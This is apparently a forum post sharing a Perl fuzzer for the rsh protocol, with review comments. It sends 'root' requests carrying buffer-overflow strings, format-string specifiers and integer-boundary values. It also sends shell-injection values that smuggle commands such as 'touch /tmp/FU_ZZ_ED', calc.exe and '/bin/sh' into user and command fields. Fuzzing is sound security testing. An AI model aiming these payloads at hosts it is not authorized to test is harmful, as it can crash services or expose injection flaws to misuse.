RSH Fuzzer

Iniciado por @ed33x, Enero 27, 2011, 08:51:20 PM



Enero 27, 2011, 08:51:20 PM Ultima modificación: Marzo 14, 2015, 09:54:46 AM por Expermicid
Código: perl
#!/usr/bin/perl
# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]
# RSHatter - RSH Protocol Fuzzer
# ~Just for fun~

use Net::Rsh;
use Getopt::Std;

# FUZZ DATA BEGIN HERE
# Four payload families. The loops further down substitute every entry, one
# at a time, into the local-user, remote-user and command fields of an rsh
# request. Every literal is single-quoted, so Perl processes no escape
# sequences inside them other than \\ and \'.

# Length-based inputs: runs of 'A' from 2,200 up to 12,000,000 characters,
# followed by repeated slash/backslash fragments.
# NOTE(review): because of the single quotes, '\\\AAAA' is the six characters
# \\AAAA and '\0x99' is the five literal characters \ 0 x 9 9, not the single
# byte 0x99 -- confirm which was intended.
@overflows = ('A' x 2200, 'A' x 4200, 'A' x 8400, 'A' x 12000, 'A' x 22000, 'A' x 52000, 'A' x 102000, 'A' x 500500,
       'A' x 1002000, 'A' x 5005000, 'A' x 12000000, '//AAAA' x 8500, '\\\AAAA' x 8500, '\0x99' x 12000);

# printf-style conversion specifiers. They only have an effect if the
# receiving code uses a request field as a format string instead of passing
# it as data.
# NOTE(review): '\0xCD' and '\0xCB' are again literal five-character strings
# (see the single-quote remark above), repeated 50 times each.
@fmtstring = ('%n%n%n%n%n', '%p%p%p%p%p', '%s%s%s%s%s', '%d%d%d%d%d', '%x%x%x%x%x',
              '%s%p%x%d', '%.1024d', '%.1025d', '%.2048d', '%.2049d', '%.4096d', '%.4097d',
              '%99999999999s', '%08x', '%%20n', '%%20p', '%%20s', '%%20d', '%%20x',
              '%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%', '\0xCD' x 50, '\0xCB' x 50);

# Numeric strings sitting on or next to 16-, 24- and 32-bit integer limits,
# in decimal and hex notation, plus very large/small floating-point literals.
# NOTE(review): '0xfffffff' has seven f's while its neighbours have eight --
# possibly deliberate, possibly a typo.
@numbers = ('0', '-0', '1', '-1', '32767', '-32768', '2147483647', '-2147483647', '2147483648', '-2147483648',
              '4294967294', '4294967295', '4294967296', '357913942', '-357913942', '536870912', '-536870912',
              '1.79769313486231E+308', '3.39519326559384E-313', '99999999999', '-99999999999', '0x100', '0x1000',
              '0x3fffffff', '0x7ffffffe', '0x7fffffff', '0x80000000', '0xffff', '0xfffffffe', '0xfffffff', '0xffffffff',
              '0x10000', '0x100000', '0x99999999', '65535', '65536', '65537', '16777215', '16777216', '16777217', '-268435455');

# Shell-metacharacter probes (pipe, backtick, quote, semicolon, &&) wrapped
# around a command with a visible side effect. The Unix variants create the
# marker file /tmp/FU_ZZ_ED: if that file exists on the tested host after a
# run, a request field reached a shell unescaped. Check for it when triaging
# results and delete it before re-running, otherwise a stale marker gives a
# false positive. The Windows variants start calc.exe for the same purpose.
@miscbugs = ('test|touch /tmp/FU_ZZ_ED|test', 'test`touch /tmp/FU_ZZ_ED`test', 'test\'touch /tmp/FU_ZZ_ED\'test',
       'test;touch /tmp/FU_ZZ_ED;test', 'test&&touch /tmp/FU_ZZ_ED&&test', 'test|C:/WINDOWS/system32/calc.exe|test',
       'test`C:/WINDOWS/system32/calc.exe`test', 'test\'C:/WINDOWS/system32/calc.exe\'test', 'test;C:/WINDOWS/system32/calc.exe;test',
       'C:/WINDOWS/system32/calc.exe"', '`/bin/sh`', '%0xa', '%u000');
# FUZZ DATA END HERE

# Command line: the only option is -t <target>, the host whose rshd is tested.
# NOTE(review): the return value of getopts() is not checked, so an unknown
# switch only produces Getopt::Std's own warning and the run continues.
getopts('t:', \%opts);
$target = $opts{'t'};

# Banner text shared by the usage message and the normal start-up output.
my $banner = "\n RSHatter - RSH Protocol Fuzzer"
           . "\nJeremy Brown [0xjbrown41\@gmail.com/jbrownsec.blogspot.com]\n";

# Without a target there is nothing to do: show the usage line and stop.
# NOTE(review): this path exits with status 0, so a wrapper script cannot
# tell a usage error from a completed run.
unless (defined $target) {
    print $banner . "\n Usage: $0 -t <target>\n\n";
    exit(0);
}

print $banner;
print "\nFuzzing RSHd @ $target... GOOD LUCK!\n";

# Fuzz driver. Every request is rsh(host, local user, remote user, command)
# with the baseline values ('root', 'root', 'id'); exactly one of the three
# fields is replaced by a payload per request. Fields are exercised in the
# order local user, remote user, command, and for each field the payload
# lists run in the order overflows, fmtstring, numbers, miscbugs.
#
# NOTE(review): the value returned by rsh() is discarded and no timeout or
# error handling surrounds the call, so this script by itself does not report
# whether the service misbehaved; the daemon has to be observed on the tested
# host (process state, logs, the /tmp/FU_ZZ_ED marker). How Net::Rsh reacts
# to a refused connection is not visible here -- presumably an exception
# would end the run at that payload; confirm against the module.

my @baseline = ('root', 'root', 'id');

# [ payload list, fixed label or undef ]. The overflow payloads are far too
# long to echo, so their progress line shows the word "overflow" instead of
# the payload itself.
my @payload_sets = (
    [ \@overflows, 'overflow' ],
    [ \@fmtstring, undef ],
    [ \@numbers,   undef ],
    [ \@miscbugs,  undef ],
);

my @field_names = ('localuser', 'remoteuser', 'cmd');

for my $slot (0 .. $#field_names) {
    my $field = $field_names[$slot];

    print "\n";

    for my $set (@payload_sets) {
        my ($payloads, $fixed_label) = @{$set};

        for my $payload (@{$payloads}) {
            my $shown = defined $fixed_label ? $fixed_label : $payload;
            print "[Target = $target] [Fuzz = $field/$shown]\n";

            # Start from the baseline and overwrite only the field under test.
            my @request = @baseline;
            $request[$slot] = $payload;

            # A fresh client object per request, as in the original.
            my $client = Net::Rsh->new();
            $client->rsh($target, @request);
        }
    }
}

print "\nFuzzing Complete. RSHaattteeeerrrrr!\n\n";

exit;